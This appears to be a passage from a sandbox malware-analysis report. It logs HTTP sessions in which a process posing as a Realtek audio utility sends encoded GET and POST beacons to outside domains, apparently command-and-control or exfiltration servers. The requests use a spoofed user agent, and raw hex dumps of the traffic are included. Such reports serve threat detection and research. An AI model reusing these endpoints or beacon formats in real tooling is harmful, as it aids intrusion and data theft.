                                                                                                  Dec 3, 2024 09:49:41.598237991 CET475INData Raw: 65 50 52 47 4b 74 4d 2b 4f 72 53 37 75 64 59 43 6c 58 47 31 41 6a 63 37 36 2f 57 47 50 38 62 6e 74 75 2b 42 62 62 66 76 2b 2f 2f 43 2b 45 4c 6a 74 49 76 4a 44 4a 75 32 5a 48 78 6e 77 4d 59 59 38 74 4f 6b 6c 6a 49 6a 36 63 6e 7a 32 46 66 37 42 78
                                                                                                  Data Ascii: ePRGKtM+OrS7udYClXG1Ajc76/WGP8bntu+Bbbfv+//C+ELjtIvJDJu2ZHxnwMYY8tOkljIj6cnz2Ff7BxGY9p2BNFfcj1EarSq2aKMrzb+kski4mHNLWuwj3Y3Qqo+DyLb3x+CXR35fzoGo54D0BpATwDdAJQpypYB4Ij+eLqk37C3Jq2Mx1PBU1DK78G64jlo+FdxzzoNPIUBaO9Mf5yKw+pVL/wCgO9yREvn12o0mXb8J+Pr
                                                                                                  Dec 3, 2024 09:49:41.598300934 CET1289INData Raw: 7a 65 74 51 73 31 79 4c 74 78 5a 73 55 71 46 47 2b 62 31 51 71 32 52 6e 52 62 67 4a 4c 59 58 68 75 76 6c 74 38 42 51 4f 77 41 69 35 70 4a 72 44 46 43 66 53 66 51 6b 42 35 6b 79 4c 61 57 6a 4d 2f 47 39 37 48 39 73 65 32 31 46 69 30 6a 57 35 66 31
                                                                                                  Data Ascii: zetQs1yLtxZsUqFG+b1Qq2RnRbgJLYXhuvlt8BQOwAi5pJrDFCfSfQkB5kyLaWjM/G97H9se21Fi0jW5f1TCR635atXVE6smxq5cXtY7oKGK45VU1W0C4DMA8Qaj/nODUV+rGP37u7gF28GEsEpibWBHJeSaCsqaAMDdumWD060Se2Sq7K9RzXg6oO8dBQvtkSwq9j81HXGEfiGRmQxstBLbTJN5GVsRKSI9+6OHTghcYyAslee
                                                                                                  Dec 3, 2024 09:49:41.598401070 CET1289INData Raw: 4c 6a 31 6b 4f 4f 78 41 4f 41 71 47 50 75 78 4f 50 30 75 6c 73 50 71 55 65 38 6a 45 34 42 6c 44 2f 35 6d 59 4e 56 2b 2b 6d 50 2f 68 6d 75 44 44 79 77 7a 69 39 62 50 43 74 6f 54 34 4f 32 76 31 73 32 39 6d 70 6d 79 59 66 36 4a 75 43 4f 39 79 34 66
                                                                                                  Data Ascii: Lj1kOOxAOAqGPuxOP0ulsPqUe8jE4BlD/5mYNV++mP/hmuDDywzi9bPCtoT4O2v1s29mpmyYf6JuCO9y4fU5on7zQH9DV/I29Z7DUb9BINRb3MR8G/kBGzLzIAB5dVmVg33kn/Jd9iM5Izr11Mz86/dWRpWLPExhTd/GQLfzUaTJshVZDw8zFwUIjddCMKeKwmr2LLZx5GVK69/qfjnPtt0KIUDLgBASS/1byinrQgim5Wh87BZ
                                                                                                  Dec 3, 2024 09:49:41.598409891 CET1289INData Raw: 37 38 74 48 2f 4a 46 69 71 65 6e 2b 64 67 4e 33 53 51 30 33 35 69 44 55 61 39 72 62 57 65 78 38 55 65 46 41 78 5a 4b 41 41 44 31 46 65 53 6a 33 5a 43 56 73 34 4f 79 4f 4c 4b 64 7a 4b 74 50 77 5a 62 52 61 6d 79 77 4e 47 4a 31 32 70 50 57 49 49 36
                                                                                                  Data Ascii: 78tH/JFiqen+dgN3SQ035iDUa9rbWex8UeFAxZKAAD1FeSj3ZCVs4OyOLKdzKtPwZbRamywNGJ12pPWII6FeeBiq51mMfX7GuPv7LDCtgJ6P0LVmLP1btrjjd5+jukZMb9kZJ+tYyf17wriekh4Dgl5ef/9qm5wahvDmAz5HVNxWu9DIBG4FdVLeHXYtiMtXtodNh2aFX/A8FWHU0TeOqJC2YTBPoRj5ZVO4pC/IMzuE4imbHCp


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  32192.168.11.304989643.156.176.253805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:49:44.118864059 CET413OUTGET /vz2d/?6aonl5x=xnuAwqhG0E1cgnLHCuPG8putHNvOywveoj5D04lQyE1r/ADkIFYhezZZAVu20e8okSIJRDKdbgbPnaZH6+cIwh3xzWT5SsSVbw2mIitnDZbRgyAsQQEm3mk=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.kmmm759j.sbs
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Dec 3, 2024 09:49:44.459743023 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Server: Tengine
                                                                                                  Date: Tue, 03 Dec 2024 08:49:44 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Content-Length: 58296
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  ETag: "67403337-e3b8"
                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                                                                  Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                                  Dec 3, 2024 09:49:44.459841013 CET1289INData Raw: 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41
                                                                                                  Data Ascii: v class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJ
                                                                                                  Dec 3, 2024 09:49:44.459849119 CET1289INData Raw: 65 2b 62 6a 71 39 61 44 35 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a 76 47 67 4b 6f 78 32 50 72 39 68 4f 49 78 32 47 35 45 51 4a 65 4c 33 6a 4d 49 6f 6c 64 44 39 33 34 70 74 50 39 6e 4b 79 52 41 54 35
                                                                                                  Data Ascii: e+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/u
                                                                                                  Dec 3, 2024 09:49:44.459855080 CET246INData Raw: 43 5a 45 72 71 65 69 72 5a 4f 45 69 46 35 37 66 6c 7a 41 6b 42 4b 46 6d 53 50 32 6a 71 35 37 4d 6a 34 4d 67 44 57 51 52 62 34 43 38 36 79 57 4e 6f 6c 37 7a 30 53 49 7a 47 57 6d 4d 39 4d 43 31 6d 61 5a 6c 50 6a 46 5a 30 6d 4e 53 35 44 43 6d 37 37
                                                                                                  Data Ascii: CZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8o
                                                                                                  Dec 3, 2024 09:49:44.459863901 CET1289INData Raw: 41 42 61 68 6b 48 67 32 6a 73 50 5a 6d 48 6a 54 50 58 42 6f 6b 2b 39 77 43 77 44 62 61 57 79 37 49 6d 4f 6b 53 46 37 48 73 68 6c 6a 4a 54 48 34 6c 66 62 52 63 4a 41 6b 32 2b 6b 38 52 4f 56 74 6e 76 66 67 4d 42 36 48 35 58 70 73 37 76 36 70 4f 43
                                                                                                  Data Ascii: ABahkHg2jsPZmHjTPXBok+9wCwDbaWy7ImOkSF7HshljJTH4lfbRcJAk2+k8ROVtnvfgMB6H5Xps7v6pOC7pcnqGCqAgO+0kQ47BeoRlR8brAHwHoFH+4wyooQaVTjebo220+2njFZ3+9eqljVd0KgdgJh7VsQIAcBx2XLvDSoIeUcyoCGAVjW1bqDMhec0wwfbdmU+wtw4QJTt2KEWjwjzLLi7E47Bcj01HJPB0LzU9k2A/yj0
                                                                                                  Dec 3, 2024 09:49:44.459918022 CET1289INData Raw: 2f 44 67 41 6a 77 4f 79 35 55 51 4d 51 43 32 55 6d 42 4d 5a 74 47 55 43 35 56 51 57 42 6d 76 67 6c 67 42 59 4e 6d 52 38 65 30 41 4c 49 47 4e 44 7a 34 52 55 6e 76 57 61 7a 32 47 52 72 51 65 44 49 34 61 32 47 2b 61 6e 51 4b 4a 2f 31 71 48 4a 55 44
                                                                                                  Data Ascii: /DgAjwOy5UQMQC2UmBMZtGUC5VQWBmvglgBYNmR8e0ALIGNDz4RUnvWaz2GRrQeDI4a2G+anQKJ/1qHJUDIAnDEnh0ByMo1z76ZNr8i0jP7w+ZoiGbQ2HZvA4BO4BUkQLMyYJQDhjQbZgwEm5IOHhzD47BcCWNW2HBYREhnBBPUgv08wsS0K7+e/7QZgJ9hJ1SihJfmE6r2AoNGNUVZR2k2i9pp90v5T+W9kMkAMB+21RIAAAwI
                                                                                                  Dec 3, 2024 09:49:44.459999084 CET1289INData Raw: 50 44 73 63 34 31 42 31 6a 75 5a 71 56 31 58 50 58 69 73 4b 54 55 6e 50 52 66 63 68 67 37 50 75 76 34 44 75 38 71 50 67 48 56 76 41 58 31 2f 44 79 7a 63 67 42 65 42 6a 41 58 77 48 34 41 32 77 31 47 2f 54 53 44 55 64 38 32 7a 2b 50 2b 31 79 6b 79
                                                                                                  Data Ascii: PDsc41B1juZqV1XPXisKTUnPRfchg7Puv4Du8qPgHVvAX1/DyzcgBeBjAXwH4A2w1G/TSDUd82z+P+1ykyhocA3M7M7OJTp2oCGCs66NBsPd+gdEktAysy/CFQp5lIlbvlQqe2t9B+FGADWNR/z1k9jCUcCjTZTaL4+vqzU8MxI24gigrt8NGGZUpiIlHhOYUckAHGnYCf1naFZ4YkNt34n54SGox6jcGob2Yw6scC2AhZMPJry
                                                                                                  Dec 3, 2024 09:49:44.460006952 CET1289INData Raw: 38 43 41 41 71 6a 6e 2b 74 6c 4d 35 76 72 79 46 2b 38 37 4d 61 53 57 72 72 70 39 4b 4d 4a 39 73 42 66 76 34 41 33 67 62 77 43 34 42 59 67 31 48 2f 69 63 47 6f 2f 39 66 6d 75 5a 45 73 54 57 4c 7a 43 5a 39 6d 4d 72 64 6e 50 35 36 2f 44 71 76 34 71
                                                                                                  Data Ascii: 8CAAqjn+tlM5vryF+87MaSWrrp9KMJ9sBfv4A3gbwC4BYg1H/icGo/9fmuZEsTWLzCZ9mMrdnP56/Dqv4qAQyY7fAWFq22VKnkNZzmlauOpiGtewJnnvexi1uAYhwrOf/KaIAHLdnlGWyDv3pzJQuuJPSEwwPT5t9vZq1qdQ0niP6UxqGAeA4uhxapflB+OnsTQeBf3H6k8Go9zUY9R8gbykHwCDYcFYA4K9VzetQs1yLtxZsUq
                                                                                                  Dec 3, 2024 09:49:44.460014105 CET1289INData Raw: 39 56 38 61 6a 48 70 62 49 34 79 2f 6c 53 34 31 77 78 6b 41 6d 33 6c 6f 41 47 43 52 78 4a 61 52 47 61 74 4b 77 47 78 35 65 4c 64 51 46 43 2b 66 75 58 2b 33 4f 73 73 6e 42 4b 6a 6d 2b 5a 68 75 4e 53 65 75 51 70 32 4b 63 32 42 62 30 66 52 33 46 68
                                                                                                  Data Ascii: 9V8ajHpbI4y/lS41wxkAm3loAGCRxJaRGatKwGx5eLdQFC+fuX+3OssnBKjm+ZhuNSeuQp2Kc2Bb0fR3FhXrKW2fR7+QyNOQi3XYJTXX8vn5lHn1kZDaB7L8DgcVH9K8YoX9RCQCgIrn4unF93Oh4pWE5ZxjUbH/2A0kg1FfwhCrnwDCfsjrnbbzW/MgQlaQl3b05TupXQcv2VIJL9c7B7XwaAAuhy9wIHM+vLj1kOOxAOAqGPu
                                                                                                  Dec 3, 2024 09:49:44.460021973 CET1289INData Raw: 41 56 34 73 6b 70 53 64 51 41 49 30 47 6b 6d 55 39 66 65 41 6e 54 71 79 58 61 61 69 73 4d 39 4b 69 78 45 77 67 4f 41 2f 6f 30 2b 76 51 42 41 38 64 72 4a 6a 5a 53 73 52 5a 66 33 7a 43 42 6b 35 67 79 42 56 74 55 79 4c 64 64 36 55 38 50 7a 4f 30 61
                                                                                                  Data Ascii: AV4skpSdQAI0GkmU9feAnTqyXaaisM9KixEwgOA/o0+vQBA8drJjZSsRZf3zCBk5gyBVtUyLdd6U8PzO0at2c0gcB0UNHH6n5AOZTDqtQajfgRkJZW3ATiiQZUYoNP0G9dmZtcOCze9iK7PXYDAv2TDPgU66oqD5ufAYVGBcxIUriXawyUOq1e98LOQg8seIt2Uvdh4+fum5+9f6ww7tdnUnDA+pEGHfV8c2578tH/JFiqen+dg
                                                                                                  Dec 3, 2024 09:49:44.799210072 CET1289INData Raw: 30 31 5a 77 75 4b 57 4c 65 78 53 6c 4b 48 6e 30 38 76 58 48 52 36 77 49 35 50 77 62 42 55 61 59 4d 43 78 33 30 51 4d 72 37 44 79 53 39 4f 78 41 62 34 61 37 33 61 36 51 54 56 61 43 6a 63 38 63 6c 44 44 57 41 73 67 4b 30 47 6f 37 36 6d 41 39 65 35
                                                                                                  Data Ascii: 01ZwuKWLexSlKHn08vXHR6wI5PwbBUaYMCx30QMr7DyS9OxAb4a73a6QTVaCjc8clDDWAsgK0Go76mA9e5gh2AXcVJ/o/k+53xzek15Ut4n2hRpcQPjef+lg5v7XQF7V+EA9OcJ51+jSIvADhYyCkRchhKDIAoMPY8GHsawGtE+AWwcJCkJgB8FNxmi+t6bB+DUV/aYNR/C2AhlBUheYBVp+Ln9Aup3Th86uoEGh22J6/qktKR2


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  33192.168.11.304989831.31.196.17805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:49:50.718355894 CET672OUTPOST /227m/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.hemph.online
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 204
                                                                                                  Origin: http://www.hemph.online
                                                                                                  Referer: http://www.hemph.online/227m/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 2b 73 64 45 67 6a 38 53 6b 54 46 6c 41 34 71 69 41 34 4c 4d 4d 52 66 4c 2f 68 61 4a 6d 43 52 75 56 64 6e 5a 4a 6b 6a 7a 7a 58 49 67 6e 2b 69 43 6c 74 78 50 53 38 63 35 73 37 74 78 65 33 34 78 70 77 79 6c 64 32 34 4f 79 70 6b 65 32 53 73 4b 42 4d 59 52 4c 4a 4b 6c 4f 70 69 30 6b 59 53 71 61 6a 56 68 61 38 79 5a 45 65 66 4d 79 61 75 62 41 74 51 56 58 36 54 63 63 7a 64 6e 49 36 37 75 73 58 66 67 65 62 2b 69 74 43 45 37 56 37 43 49 66 50 2b 31 4f 6f 35 64 50 46 68 56 2b 50 71 37 72 6b 76 31 41 50 6b 34 72 78 46 46 47 68 41 6f 49 72 53 51 57 55 38 54 4c 6a 49 4b 30 71 53 41 4b 41 3d 3d
                                                                                                  Data Ascii: 6aonl5x=+sdEgj8SkTFlA4qiA4LMMRfL/haJmCRuVdnZJkjzzXIgn+iCltxPS8c5s7txe34xpwyld24Oypke2SsKBMYRLJKlOpi0kYSqajVha8yZEefMyaubAtQVX6TcczdnI67usXfgeb+itCE7V7CIfP+1Oo5dPFhV+Pq7rkv1APk4rxFFGhAoIrSQWU8TLjIK0qSAKA==
                                                                                                  Dec 3, 2024 09:49:50.950145960 CET375INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx
                                                                                                  Date: Tue, 03 Dec 2024 08:49:50 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  Content-Encoding: gzip
                                                                                                  Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  34192.168.11.304989931.31.196.17805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:49:53.465356112 CET692OUTPOST /227m/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.hemph.online
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 224
                                                                                                  Origin: http://www.hemph.online
                                                                                                  Referer: http://www.hemph.online/227m/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 2b 73 64 45 67 6a 38 53 6b 54 46 6c 53 4c 69 69 42 62 54 4d 62 68 66 4b 36 68 61 4a 77 79 52 71 56 64 72 5a 4a 67 62 6a 7a 6c 63 67 6b 66 53 43 71 49 64 50 65 63 63 35 2f 37 73 31 51 58 34 32 70 77 76 47 64 32 30 4f 79 6f 41 65 32 58 6f 4b 41 37 45 57 4c 5a 4b 6e 47 4a 69 68 70 34 53 71 61 6a 56 68 61 34 69 2f 45 65 6e 4d 79 71 65 62 42 50 30 55 65 61 54 66 66 7a 64 6e 43 71 37 31 73 58 66 34 65 61 79 45 74 45 41 37 56 2b 6d 49 59 64 58 48 41 6f 34 33 4c 46 67 34 2f 4e 37 48 76 48 76 33 4d 66 51 54 6e 68 6c 75 48 32 74 79 56 6f 6d 53 46 30 41 2b 58 69 6c 69 32 6f 54 62 58 4d 4c 46 30 65 70 63 65 38 66 6b 31 4d 54 4b 59 59 44 48 4c 2b 41 3d
                                                                                                  Data Ascii: 6aonl5x=+sdEgj8SkTFlSLiiBbTMbhfK6haJwyRqVdrZJgbjzlcgkfSCqIdPecc5/7s1QX42pwvGd20OyoAe2XoKA7EWLZKnGJihp4SqajVha4i/EenMyqebBP0UeaTffzdnCq71sXf4eayEtEA7V+mIYdXHAo43LFg4/N7HvHv3MfQTnhluH2tyVomSF0A+Xili2oTbXMLF0epce8fk1MTKYYDHL+A=
                                                                                                  Dec 3, 2024 09:49:53.683819056 CET375INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx
                                                                                                  Date: Tue, 03 Dec 2024 08:49:53 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  Content-Encoding: gzip
                                                                                                  Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  35192.168.11.304990031.31.196.17805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:49:56.219490051 CET1289OUTPOST /227m/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.hemph.online
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 3340
                                                                                                  Origin: http://www.hemph.online
                                                                                                  Referer: http://www.hemph.online/227m/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 2b 73 64 45 67 6a 38 53 6b 54 46 6c 53 4c 69 69 42 62 54 4d 62 68 66 4b 36 68 61 4a 77 79 52 71 56 64 72 5a 4a 67 62 6a 7a 6c 45 67 6e 73 4b 43 72 72 46 50 66 63 63 35 38 37 73 32 51 58 35 7a 70 77 32 50 64 32 49 65 79 72 6f 65 33 78 55 4b 56 35 73 57 45 5a 4b 6e 4b 70 6a 47 6b 59 53 7a 61 6e 78 6c 61 38 47 2f 45 65 6e 4d 79 73 53 62 47 64 51 55 59 61 54 63 63 7a 64 72 49 36 36 37 73 58 6e 47 65 61 6d 79 74 43 63 37 55 49 36 49 66 75 2f 48 41 6f 34 33 4d 46 67 35 2f 4e 33 43 76 47 48 6a 4d 65 59 6c 6d 51 52 75 45 41 30 46 42 71 6d 6a 59 6c 4d 4c 55 7a 51 66 67 35 7a 74 58 38 6d 6a 35 76 70 6b 59 73 48 75 75 71 54 6c 4a 4b 47 41 57 62 4f 7a 50 79 51 6d 4d 38 30 50 44 35 78 7a 72 39 52 43 59 61 36 5a 47 64 43 51 42 74 49 63 6e 79 55 31 76 48 54 6a 54 7a 54 69 2b 6e 67 66 4c 55 66 6a 46 46 71 79 65 2b 37 57 59 55 4b 2b 4d 68 55 6e 50 41 42 69 48 79 71 4e 30 72 7a 56 6e 4a 6e 64 51 41 6f 57 45 51 68 64 68 55 4f 35 53 4a 65 37 45 78 4d 4a 47 55 4c 42 49 2b 39 54 6c 41 52 74 6c 52 [TRUNCATED]
                                                                                                  Data Ascii: 6aonl5x=+sdEgj8SkTFlSLiiBbTMbhfK6haJwyRqVdrZJgbjzlEgnsKCrrFPfcc587s2QX5zpw2Pd2Ieyroe3xUKV5sWEZKnKpjGkYSzanxla8G/EenMysSbGdQUYaTcczdrI667sXnGeamytCc7UI6Ifu/HAo43MFg5/N3CvGHjMeYlmQRuEA0FBqmjYlMLUzQfg5ztX8mj5vpkYsHuuqTlJKGAWbOzPyQmM80PD5xzr9RCYa6ZGdCQBtIcnyU1vHTjTzTi+ngfLUfjFFqye+7WYUK+MhUnPABiHyqN0rzVnJndQAoWEQhdhUO5SJe7ExMJGULBI+9TlARtlRxUlJL69eU2ysAi87zeMcIC2+OleGn97xwuLsVBm+WfTk/Azi0c+Z8g59MR53OP4VomNKTPniSS5HyZWfHnauQcB9Fs2ctEj7+H5ZYulPdn0KwEsddcjR/aqNunvbWc5+6SMyEIeJdU9YApmp4qx/5hVBbNSi9kt2e3OSkVtBsprPxReGUNUmHsTBVNq3gWzj9APuZ+Tvb+jY14Iwk9BCw+7sqTI8BaNuoe0XYVLH4krRn/WuqdriTNfy7S1Bnw7bvNDaoVFW0wx7gDayYUczYIxYq5+kSZ2IS2fQnLf4YD8N51wkfP21/dHZP9MfZtsUcQl1I1O0ZoCI2ZfGHR5X8KY/By0XZMOTpJNG/c1KXNMgBsYSr5yVz/1yuvLHlWGRiQ86H/eMZrh9Q2rYn3D7JA9rpaichzpDcIkwS9y0qWCgr2IRD4Y4sdiDkbpoONWGM24KlAY7m/7r7+WHtrSAo1mjpo+Ew3zRIP
                                                                                                  Dec 3, 2024 09:49:56.219538927 CET2520OUTData Raw: 38 75 47 56 6f 6e 65 30 48 31 6c 61 2f 79 44 4a 4d 58 75 35 6e 43 62 55 65 44 55 4e 63 74 4a 41 79 63 67 6b 49 4c 46 4c 44 68 48 68 70 58 71 52 4e 45 2f 68 6d 35 6a 53 62 30 76 73 43 32 31 4c 42 48 50 62 6e 66 6e 61 6b 49 79 66 49 30 2f 31 65 67
                                                                                                  Data Ascii: 8uGVone0H1la/yDJMXu5nCbUeDUNctJAycgkILFLDhHhpXqRNE/hm5jSb0vsC21LBHPbnfnakIyfI0/1egInEcxgzeW3qDnwGVaLn5bXBD/stYrpVWIwLnH6Kmj9kQuDj80Fb74qO0CAL5Kg+bSB42ooSC5EoKm7Jm1/p7UxUwUGhmCeOjku2E0EYmSCnLyPMvHCKYoZRpqo/Y7iv5UAY35bwneeaBdiMFUHmVhjgZ0sI/lGW6U
                                                                                                  Dec 3, 2024 09:49:56.465445042 CET375INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx
                                                                                                  Date: Tue, 03 Dec 2024 08:49:56 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  Content-Encoding: gzip
